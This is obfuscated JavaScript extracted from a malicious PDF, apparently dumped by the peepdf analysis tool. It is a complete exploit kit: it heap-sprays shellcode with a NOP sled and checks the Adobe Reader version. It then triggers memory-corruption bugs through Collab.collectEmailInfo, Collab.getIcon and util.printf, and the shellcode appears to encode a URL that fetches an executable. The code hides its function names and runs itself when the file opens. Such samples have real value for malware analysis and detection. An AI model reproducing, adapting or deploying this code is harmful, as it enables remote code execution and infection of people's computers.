// peepdf comment: Javascript code located in object 7 (version 0)

var xyutequex = false;
var wochechuc = new Array();

function hethithyq() {}
function wexyixyat() {}
var thexye;

function cazethexy(cazethexy) {
    return true;
}
this.pecuwo = 24560;

function kazuq(mochyb, fabaquochu) {
    function thith(thith) {
        return thith;
    }
    while (mochyb.length * 2 < fabaquochu) mochyb += mochyb;
    this.quynopaque = 'quynopaque';
    mochyb = mochyb.substring(0, fabaquochu / 2);

    function natoj(natoj) {
        return natoj;
    }
    return mochyb;
}
this.laxyeth = false;

function tychux(gabuz) {
    var nithochyp = false;
    var xyicedax = 0x0c0c0c0c;
    var queth = false;
    var cotuchuvuq = false;
    var xyymichan = new Array('%u4343%', 'u4343%u', '4343%u', '0FEB%u', '335B%', 'u66C9%', 'u80B9%u', '8001%u', 'EF33%u', 'E243%u', 'EBFA%uE8', '05%uFF', 'EC%uFFFF', '%u8B7F%u', 'DF4E%', 'uEFEF%', 'u64EF%u', 'E3AF%', 'u9F64%u', '42F3%u9F', '64%u6E', 'E7%uEF', '03%uEF', 'EB%u64', 'EF%uB', '903%u', '6187%uE1', 'A1%u0', '703%u', 'EF11%uEF', 'EF%uAA', '66%uB9E', 'B%u77', '87%u651', '1%u07E', '1%uEF', '1F%uEFEF', '%uAA66%', 'uB9E7%', 'uCA87%u', '105F%', 'u072D', '%uEF0D', '%uEFEF', '%uAA6', '6%uB9', 'E3%u00', '87%u0F2', '1%u078F%', 'uEF3B%', 'uEFEF%uA', 'A66%uB', '9FF%u', '2E87%u0', 'A96%u075', '7%uEF', '29%uEFE', 'F%uAA', '66%uAF', 'FB%uD76', 'F%u9A', '2C%u6615', '%uF7AA%', 'uE806%u', 'EFEE%uB1', 'EF%u9', 'A66%u64', 'CB%uEBAA', '%uEE85', '%u64B', '6%uF7B', 'A%u07B9%', 'uEF64', '%uEFEF', '%u87B', 'F%uF5D', '9%u9FC0%', 'u7807', '%uEFEF%', 'u66EF', '%uF3A', 'A%u2A6', '4%u2F6', 'C%u66BF', '%uCFAA%u', '1087%', 'uEFEF%', 'uBFEF%', 'uAA64', '%u85FB', '%uB6ED', '%uBA64%u', '07F7%uE', 'F8E%uEF', 'EF%uA', 'AEC%u2', '8CF%uB3E', 'F%uC19', '1%u28', '8A%uE', 'BAF%u', '8A97%uE', 'FEF%u9A', '10%u64CF', '%uE3AA%u', 'EE85%u64', 'B6%uF', '7BA%uA', 'F07%uEFE', 'F%u85', 'EF%uB7E8', '%uAAE', 'C%uDCCB%', 'uBC34%u', '10BC%uCF', '9A%uBC', 'BF%uAA6', '4%u85F3', '%uB6EA%u', 'BA64%u0', '7F7%uEF', 'CC%uEFE', 'F%uEF', '85%u9', 'A10%u6', '4CF%u', 'E7AA%uED', '85%u64', 'B6%uF7B', 'A%uFF', '07%uEFEF', '%u85EF', '%u6410%u', 'FFAA%uE', 'E85%u6', '4B6%uF7', 'BA%uEF0', '7%uEFEF', '%uAEEF%', 'uBDB4%u', '0EEC%u', '0EEC%u', '0EEC%u0E', 'EC%u0', '36C%uB5E', 'B%u64', 'BC%u0', 'D35%uBD1', '8%u0F10%', 'u64BA', '%u6403%u', 'E792%', 'uB264%uB', '9E3%u9C6', '4%u64D', '3%uF19', 'B%uEC9', '7%uB9', '1C%u99', '64%uEC', 'CF%uDC1', 'C%uA62', '6%u42', 'AE%u2', 'CEC%uDC', 'B9%uE01', '9%uFF', '51%u1', 'DD5%uE', '79B%u212', 'E%uECE', '2%uAF1D', '%u1E04%', 'u11D4%u9', 'AB1%uB', '50A%u046', '4%uB564', '%uECCB', '%u8932', '%uE364', '%u64A4%u', 'F3B5%u3', '2EC%uEB6', '4%uEC', '64%uB1', '2A%u2DB', '2%uEFE', '7%u1B', '07%u10', '11%uBA1', '0%uA3', 'BD%uA0A2', '%uEFA1%u', '7468%u70', '74%u2F', '3A%u77', '2F%u777', '7%u65', '2E%u617', '6%u676E', '%u6C65', '%u736', '9%u6863', '%u692D', '%u2D6E%', 'u6172%u', '6874%u64', '2E%u2F6', '5%u61', '6C%u646E', '%u6E69', '%u2F67%u', '7865%u', '2E65%u68', '70%u3F7', '0%u3D78', '%u647', '0%u0066', '');

    function kychojop(kychojop) {
        return true;
    }
    xyythoch = xyymichan.join("");
    var quachytho = 9814;
    var thicho = 'thicho';
    var quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);

    function cytichich(cytichich) {
        return cytichich;
    }
    var xyewud = 13398;
    if (gabuz == 1) {
        this.choxye = false;
        xyicedax = 0x30303030;

        function pedip(pedip) {
            return true;
        }
        quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);
        this.chevyfemaq = "chevyfemaq";
    } else if (gabuz == 2) {
        var xyajy = 'xyajy';
        quafynuquo = eval("une" + "sca" + "pe" + "")(xyythoch);

        function xyisupody(xyisupody) {
            return true;
        }
    }
    var cyquelejaq = false;

    function thochy() {}
    this.jogixyu = 1171;
    var quovequiva = 0x400000;
    var parethece = false;
    var rycofychum = quafynuquo.length * 2;
    this.xyycha = false;
    var fabaquochu = quovequiva - (rycofychum + 0x38);
    this.fucaquich = 'fucaquich';
    var mochyb = eval("une" + "sca" + "pe" + "")("%u909" + "0%u90" + "90" + "");

    function wecaxya(wecaxya) {
        return true;
    }
    mochyb = kazuq(mochyb, fabaquochu);

    function chequoc() {}
    var bijuja = (xyicedax - 0x400000) / quovequiva;
    this.thyque = 'thyque';
    for (var zeduxy = 0; zeduxy < bijuja; zeduxy++) wochechuc[zeduxy] = mochyb + quafynuquo;

    function quesuz(quesuz) {
        return true;
    }
}
function xyejywed() {
    var xyixyuquac = 'xyixyuquac';
    var micachy = 0;
    this.chuthoc = "chuthoc";
    var kaxyucochi = app.viewerVersion.toString();

    function quothete(quothete) {
        return true;
    }
    app.clearTimeOut(thexye);
    this.chahach = "chahach";
    if ((kaxyucochi >= 8 && kaxyucochi < 8.102) || kaxyucochi < 7.1) {
        this.quakaxyi = false;
        tychux(0);

        function xyuchonyq(xyuchonyq) {
            return true;
        }
        var requochos = unescape("%u" + "0c" + "0c" + "%u" + "0c" + "0c" + "");
        var xyimy = 21631;
        while (requochos.length < 0xaf98) requochos += requochos;
        var xyeth = false;
        eval("this")["co" + "ll" + "ab" + "St" + "or" + "e" + ""] = eval("Col" + "lab" + "")["co" + "ll" + "ec" + "tE" + "ma" + "il" + "In" + "fo" + ""]({
            subj: "dilyxyyqu",
            msg: requochos
        });
        var jequed = 'jequed';
    }
    if ((kaxyucochi >= 8.102 && kaxyucochi < 8.104) || (kaxyucochi >= 9 && kaxyucochi < 9.1) || kaxyucochi <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["get" + "Ico" + "n" + ""]) {
                function dachi(dachi) {
                    return dachi;
                }
                tychux(2);
                this.thexyi = "thexyi";
                var dumizec = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var masyxyuch = 'masyxyuch';
                this.xyychy = 'xyychy';
                while (dumizec.length < 0x4000) dumizec += dumizec;
                this.xyyxyas = 11155;
                dumizec = "N." + dumizec;

                function chiquuchib(chiquuchib) {
                    return true;
                }
                eval("ap" + "p" + "")["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["ge" + "tI" + "co" + "n" + ""](dumizec);
                var thada = 'thada';
                micachy = 1;

                function xyuchocho(xyuchocho) {
                    return true;
                }
            } else micachy = 1;
        } catch (e) {
            micachy = 1;
        }
        if (micachy == 1) {
            if (kaxyucochi == 8.102 || kaxyucochi == 7.1) {
                tychux(1);
                this.dykexy = 15280;
                var tyxyecechi = 12954;
                eval("ut" + "il" + "")["pri" + "ntf" + ""]("%4" + "50" + "00" + "f" + "", "1299999999999999" + "9999888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "88888888" + "");
            }
        }
    }
}
app.chiny = xyejywed;

function noquifyqu(noquifyqu) {
    return noquifyqu;
}
thexye = app.setTimeOut("app.chiny()", 10);

